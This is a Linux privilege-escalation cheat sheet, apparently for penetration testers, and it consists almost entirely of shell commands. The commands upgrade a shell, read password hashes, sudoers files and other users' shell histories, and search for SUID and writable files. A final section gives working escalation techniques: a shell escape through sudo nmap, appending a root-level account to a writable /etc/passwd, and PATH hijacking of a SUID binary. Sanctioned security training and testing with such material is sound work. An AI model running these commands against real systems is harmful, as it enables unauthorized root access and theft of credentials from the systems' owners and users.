Please read the Disclaimer.
Commands are on separate lines to help learn the output.
Shell
Upgrade to bash:
python -c 'import pty; pty.spawn("/bin/bash")'Host Information
Get OS version, patches, etc.:
/bin/uname -a
/usr/bin/lsb_release -a
/bin/cat /etc/*-releaseUser Information
Get current user:
/usr/bin/whoami
/usr/bin/idGet user command history:
/bin/cat /home/$(whoami)/.bash_history
/bin/cat /home/$(whoami)/.nano_history
/bin/cat /home/$(whoami)/.vim_history
/bin/cat /home/$(whoami)/.atftp_history
/bin/cat /home/$(whoami)/.mysql_history
/bin/cat /home/$(whoami)/.php_historyGet environment variables and PATH:
set
/bin/echo $PATHReset $PATH and environment variables:
set -a
source /etc/environment
. ~/
set +aList users:
/bin/cat /etc/passwd
/bin/cat /etc/group
/bin/cat /etc/sudoersAttempt to list hashed passwords:
/bin/cat /etc/shadowCurrent logon and last logon:
/usr/bin/w
/usr/bin/lastServices
Current processes:
/bin/ps -ef | /bin/grep root
/bin/ps -ef | /bin/grep $(whoami)
/bin/netstat -at
/bin/netstat -atnl
/bin/ssTasks
List cron jobs:
/usr/bin/crontab -l
/bin/ls -alh /var/spool/cron
/bin/ls -al /etc/ | grep cron
/bin/ls -al /etc/cron*
/bin/cat /etc/cron*
/bin/cat /etc/at.allow
/bin/cat /etc/at.deny
/bin/cat /etc/cron.allow
/bin/cat /etc/cron.denyNetwork
List network configuration:
/sbin/ifconfig
/sbin/iwconfig
/sbin/ip a
/bin/cat /etc/network/interfaces
/bin/cat /etc/sysconfig/network
/bin/cat /etc/resolv.conf
/bin/cat /etc/sysconfig/network
/bin/cat /etc/networks
/sbin/ifconfig -aiptables -L
/bin/hostname
/bin/dnsdomainnamePrograms and Binaries
Search for installed programs or binaries:
/bin/ls -lha /bin
/bin/ls -lha /usr/bin
/bin/ls -lha /opt/
/bin/ls -lha /sbin/
/bin/ls -lha /var/cache/apt/archivesO
/bin/ls -lha /var/cache/yum/*
dpkg -l
rpm -qaWeak Permissions
SUID/SGID, RWX, Current User:
/usr/bin/find / -type f -perm 0777 2>/dev/null
/usr/bin/find / -user $(whoami) 2>/dev/null
/bin/ls -ahlR /home/
/bin/ls -ahlR /root/ Files from specific group:
find / -group <group> 2>/dev/nullFind writable files (newer systems):
/usr/bin/find / -perm /6000 2> /dev/null
/usr/bin/find / -perm /4000 2> /dev/null
/usr/bin/find / -perm -g=s -o -perm /4000 ! -type l -maxdepth 3 -exec /bin/ls -ld {} \; 2>/dev/null
/usr/bin/find / -perm /222 -type d 2>/dev/nullFind writable files (older systems):
/usr/bin/find / -perm +6000 2> /dev/null
/usr/bin/find / -perm +4000 2> /dev/null
/usr/bin/find / -perm -g=s -o -perm +4000 ! -type l -maxdepth 3 -exec /bin/ls -ld {} \; 2>/dev/null
/usr/bin/find / -perm -222 -type d 2>/dev/nullSudo Permissions
Attempt sudo:
/usr/bin/sudo su -See if anything can run with sudo:
/usr/bin/sudo -lFind mail files:
/bin/cat /var/mail/root
/bin/cat /var/mail/${whoami}
/bin/cat /var/spool/mail/root
/bin/cat /var/spool/mail/${whoami}File System
Mounted drives:
/bin/df -lh
/bin/cat /etc/fstab
/bin/mount | column -tFiles
Search for potentially sensitive files:
/usr/bin/find / -type f -name "*.txt" 2> /dev/null
/usr/bin/find / -type f -name "*.log" 2> /dev/null
/usr/bin/find / -type f -name "*.sh" 2> /dev/null
/usr/bin/find / -type f -name "*.rar" 2> /dev/null
/usr/bin/find / -type f -name "*.zip" 2> /dev/null
/usr/bin/find / -type f -name "*.tar" 2> /dev/null
/usr/bin/find / -type f -name "*.gz" 2> /dev/null
/usr/bin/find / -type f -name "*.pdf" 2> /dev/null
/usr/bin/find / -type f -name "*.xls" 2> /dev/null
/usr/bin/find / -type f -name "*.xlsx" 2> /dev/null
/usr/bin/find / -type f -name "*.xml" 2> /dev/null
/usr/bin/find / -type f -name "*server.xml" 2> /dev/null
/usr/bin/find / -name *name* 2> /dev/null
/usr/bin/find / -type f -iname ".*" -ls 2> /dev/null
/usr/bin/find -maxdepth 2 -type f -ls -exec file -b {} \;Elevations
If the user can sudo with nmap:
sudo nmap --interactiveThen escape:
!shIf /etc/passwd is writable:
openssl passwd -1 -salt <user> <password>Then run above output with:
echo "<user>:<output>:0:0:root:/root:/bin/bash" >> /etc/passwdIf a SUID file has relative instead of absolute path (example if binary backup runs cat /etc/shadow then make a file called cat:
echo "<exploit-code" > cat
chmod +x catThen update PATH and run
export PATH=~/:$PATH
./backup